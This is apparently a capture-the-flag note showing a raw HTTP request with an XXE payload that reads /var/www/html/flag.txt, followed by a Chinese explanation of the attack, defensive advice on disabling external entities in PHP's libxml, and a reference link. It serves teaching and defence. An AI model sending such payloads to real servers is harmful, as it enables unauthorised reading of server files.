POST / HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/xml
Content-Length: 145
Connection: close
Cookie: PHPSESSID=aro5qb75jpljgc0kenk2g1ef22
<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///var/www/html/flag.txt" >]>
<message>&xxe;</message>
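说明:上面的请求在 DTD 中声明了外部实体 xxe,并在 <message> 元素中引用它;只有当服务端的 XML 解析器会解析外部实体并把结果回显时,响应中才会带出该文件的内容。防御上应在解析器中禁用 DTD 与外部实体解析(从 PHPSESSID 推测后端可能是 PHP,此时不要给 libxml 传入 LIBXML_NOENT 选项),并避免将解析后的内容原样返回给客户端。

参考链接
先知社区-一篇文章带你深入理解漏洞之 XXE 漏洞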